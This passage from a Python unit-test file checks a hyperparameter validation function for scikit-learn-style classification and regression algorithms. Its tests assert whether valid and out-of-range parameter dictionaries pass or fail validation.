self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_naivebayes_2(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': -1.0, 'class_prior': None, 'fit_prior': True}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_naivebayes_3(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 5.6, 'class_prior': None, 'fit_prior': False}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_naivebayes_4(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 0, 'class_prior': None, 'fit_prior': True}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- GradientBoostingMachines -------------------- #
def test_gbm_1(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 0.0,'criterion': 'friedman_mse','init': None,'learning_rate': 0.1,'loss': 'deviance','max_depth': 3,'max_features': None,'max_leaf_nodes': None,'min_impurity_decrease': 0.0,'min_impurity_split': None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_iter_no_change': None,'random_state': None,'subsample': 1.0,'tol': 0.0001,'validation_fraction': 0.1,'verbose': 0,'warm_start': False}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_2(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': -1.9}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_3(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'somethingrandom'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_4(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential'}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_5(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_6(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 2.3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_7(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":-3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_8(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":0.5}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_9(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":0.5,"min_samples_split":4}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_10(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":0.7,"min_samples_split":0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_11(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":1,"min_samples_split":-10}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_12(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "n_iter_no_change":0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_13(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "n_iter_no_change":1,"subsample":2.6}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_14(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "n_iter_no_change":1,"subsample":0.6}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_15(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,"validation_fraction":30}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_16(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,"validation_fraction":0.5}
# assertion should pass
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
#----------------------XGradientBoosting-------------------------#
def test_xgradientboosting_1(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': None,
'colsample_bynode': None, 'colsample_bytree': None, 'gamma': None, 'learning_rate': None,
'max_delta_step': None, 'max_depth': None, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_2(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 2.5,
'colsample_bynode': -2.4, 'colsample_bytree': None, 'gamma': None, 'learning_rate': None,
'max_delta_step': None, 'max_depth': None, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_3(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 2.5,
'colsample_bynode': -2.4, 'colsample_bytree': None, 'gamma': -1.2, 'learning_rate': None,
'max_delta_step': None, 'max_depth': None, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_3b(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 0.5,
'colsample_bynode': 0.4, 'colsample_bytree': None, 'gamma': -1.2, 'learning_rate': None,
'max_delta_step': None, 'max_depth': None, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_4(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 0.5,
'colsample_bynode': 0.4, 'colsample_bytree': None, 'gamma': 10, 'learning_rate': -1,
'max_delta_step': None, 'max_depth': None, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_5(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 0.5,
'colsample_bynode': 0.4, 'colsample_bytree': None, 'gamma': 10, 'learning_rate': 2,
'max_delta_step': 0, 'max_depth': -1, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_6(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 0.5,
'colsample_bynode': 0.4, 'colsample_bytree': None, 'gamma': 10, 'learning_rate': 2,
'max_delta_step': 0, 'max_depth': 3, 'min_child_weight': None, 'missing': None,
'n_estimators': -100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_7(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': 0.5,
'colsample_bynode': 0.4, 'colsample_bytree': None, 'gamma': 10, 'learning_rate': 2,
'max_delta_step': 0, 'max_depth': 3, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
#------------------------------------ SupportVectorMachines ----------------------------------------#
def test_supportvectormachines_1(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': 0.0,
'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_2(self):
algorithm = "SupportVectorMachines"
params = {'C': -1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': 0.0,
'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_3(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_4(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': -3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_5(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 30, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1.9,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_6(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 30, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -3,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': -0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_7(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 30, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -3,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
#-----------------------LogisticRegression--------------------------------#
def test_logisticregression_1(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_2(self):
algorithm = "LogisticRegression"
params = {'C': -1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_3(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': -1.90,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_4(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1.89,
'l1_ratio': None, 'max_iter': -10.0, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_5(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': "100", 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_6(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'randomstring',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_7(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': -0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_8(self):
algorithm = "LogisticRegression"
params = {'C': 4.0, 'class_weight': None, 'dual': False, 'fit_intercept': False, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 10000, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l1',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
class TestScikitRegressionAlgo(unittest.TestCase):
def setUp(self):
self.library = "scikit"
self.service = "regression"
# ----------------- DecisionTrees -------------------#
def test_DecisionTrees_1(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_2(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': -0.3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_3(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': -1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_4(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 0.5,
'min_samples_split': -2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_5(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 0.5,
'min_samples_split': 0.3, 'min_weight_fraction_leaf': 0.4, 'random_state': None, 'splitter': 'best'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- RandomForest -------------------#
def test_randomforest_1(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_2(self):
algorithm = "RandomForest"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': -34.789, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_3(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': -1.3, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_4(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': -0.2, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_5(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': -100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_6(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': "radom", 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_7(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 5, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 1.67, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 6, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- Bagging -------------------#
def test_bagging_1(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,
'max_samples': 1.0, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_2(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': False, 'bootstrap_features': False, 'max_features': -3565,
'max_samples': 345, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- GradientBoostingMachines -------------------#
def test_GradientBoostingMachines_1(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_2(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': -0.9, 'ccp_alpha': 0.06, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_3(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': -0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_4(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 56,
'loss': 'ls', 'max_depth': -3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_5(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': -2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_6(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': -0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_7(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': -15,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_8(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 6, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 56,
'loss': 'ls', 'max_depth': 39, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 0.9, 'tol': 6,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- ExtraTrees -------------------#
def test_extratrees_1(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_2(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': 3.6, 'max_features': 'auto',
